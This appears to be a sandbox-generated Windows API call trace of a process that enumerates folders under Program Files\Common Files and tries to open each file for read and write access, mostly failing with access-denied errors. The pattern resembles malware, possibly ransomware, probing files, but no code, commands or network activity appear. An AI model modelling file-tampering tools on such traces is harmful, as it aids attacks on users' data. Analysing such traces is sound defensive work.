MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x67240, cchWideChar=42 | out: lpWideCharStr="C:\\Program Files\\Common Files\\omnipos.exe") returned 42 [0087.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.822] GetLastError () returned 0x20 [0087.822] GetLastError () returned 0x20 [0087.822] SetLastError (dwErrCode=0x20) [0087.822] GetLastError () returned 0x20 [0087.822] SetLastError (dwErrCode=0x20) [0087.822] GetLastError () returned 0x20 [0087.822] SetLastError (dwErrCode=0x20) [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67240 | out: hHeap=0x20000) returned 1 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.822] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Services", cAlternateFileName="")) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0087.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0087.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0087.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.823] AreFileApisANSI () returned 1 [0087.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Services", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Services", lpUsedDefaultChar=0x0) returned 39 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.823] AreFileApisANSI () returned 1 [0087.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0087.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0087.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Services") returned 39 [0087.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services" (normalized: "c:\\program files\\common files\\services"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.824] GetLastError () returned 0x5 [0087.824] GetLastError () returned 0x5 [0087.824] SetLastError (dwErrCode=0x5) [0087.824] GetLastError () returned 0x5 [0087.824] SetLastError (dwErrCode=0x5) [0087.824] GetLastError () returned 0x5 [0087.824] SetLastError (dwErrCode=0x5) [0087.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.824] AreFileApisANSI () returned 1 [0087.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0087.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cdf0 [0087.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6cdf0, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Services") returned 39 [0087.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services" (normalized: "c:\\program files\\common files\\services"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.824] GetLastError () returned 0x5 [0087.824] GetLastError () returned 0x5 [0087.824] SetLastError (dwErrCode=0x5) [0087.824] GetLastError () returned 0x5 [0087.824] SetLastError (dwErrCode=0x5) [0087.824] GetLastError () returned 0x5 [0087.824] SetLastError (dwErrCode=0x5) [0087.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0087.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.825] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="System", cAlternateFileName="")) returned 1 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0087.825] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x781d0 [0087.825] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.825] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440ad34a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440ad34a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440ad34a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0087.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.826] AreFileApisANSI () returned 1 [0087.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Services\\verisign.bmp", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Services\\verisign.bmp", lpUsedDefaultChar=0x0) returned 52 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0087.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0087.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.827] AreFileApisANSI () returned 1 [0087.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0087.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0087.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 52 [0087.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.997] GetFileType (hFile=0x424) returned 0x1 [0087.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0087.997] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.997] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.997] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.997] CloseHandle (hObject=0x424) returned 1 [0087.997] AreFileApisANSI () returned 1 [0087.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0087.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0087.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x469e8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 52 [0087.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.998] GetLastError () returned 0x5 [0087.998] GetLastError () returned 0x5 [0087.998] SetLastError (dwErrCode=0x5) [0087.998] GetLastError () returned 0x5 [0087.998] SetLastError (dwErrCode=0x5) [0087.998] GetLastError () returned 0x5 [0087.998] SetLastError (dwErrCode=0x5) [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0087.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.998] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x66, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x76028, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x66, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\v", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓઎")) returned 0 [0087.998] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0087.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0087.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0087.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71828 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0087.999] AreFileApisANSI () returned 1 [0087.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System", lpUsedDefaultChar=0x0) returned 37 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.999] RtlAllocateHeap 